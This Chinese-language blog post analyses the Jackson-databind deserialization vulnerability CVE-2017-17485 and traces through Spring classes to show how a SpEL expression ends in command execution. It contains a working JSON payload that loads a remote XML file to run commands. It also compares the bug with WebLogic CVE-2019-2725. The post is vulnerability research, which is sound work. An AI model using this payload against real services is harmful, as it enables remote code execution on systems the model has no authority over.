红日攻防实验室

红日攻防实验室



CVE-2017-17485 Jackson-databind 反序列化

下载.jpeg

CVE-2017-17485 Jackson-databind 反序列化

0x01 概述

Jackson-databind的作用简单来说就是就是将json转换成对象。

0x02 漏洞分析

从payload来看,应该也是和

org.springframework.context.support.FileSystemXmlApplicationContext这个有关系。

{"id":123, "obj": ["org.springframework.context.support.FileSystemXmlApplicationContext", "https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml"]}

在这个地方下一个断点

org/springframework/context/support/FileSystemXmlApplicationContext.class

通过idea可以通过diagrams的Show Diagram Popup查看类与接口之间的继承关系。

在beanFactory中有getBean的构造方法

而实际getBean的构造方法是在AbstractBeanFactory类中调用。

我们试着在AbstractBeanFactory类中的getBean方法下个断点也就是说程序通过一系列的json反序列化,以及反射机制进入到了getBean方法,并且获取到了这个name为pb的方法。

在org.springframework.beans.factory.support.BeanDefinitionValueResolver#resolveValueIfNecessary这里下断点,我看到经过evaluate处理之后valueObject等于我们要执行的calc.exe。

这里看一下evaluate方法的实现。

然后会继续解析#{ pb.start() }进,对#{ pb.start() }进行spel操作。

当解析完pb.start操作后就会命令执行。

0x03 后话

回过头看一下发现Weblogic-CVE-2019-2725使用的FileSystemXmlApplicationContext和CVE-2017-17485使用的FileSystemXmlApplicationContext相比缺少了一步表达式解析,也就是

Object valueObject = this.evaluate(typedStringValue);

那我试试看,调整一下payload,当然也是可以的。

也就是说实际上CVE-2017-17485所用到的spring版本为5.0.2,它足够高,支持spel表达式的方法来初始化bean对象,而Weblogic-CVE-2019-2725所用到的spring版本过低,无法支持spel表达式,所以它需要通过指定init-method的方法来初始化bean对象。

0x04 Reference

jackson-rce-via-spel

 标签: none

作者  :  redBu11



关于我

about me

redBu11

联系我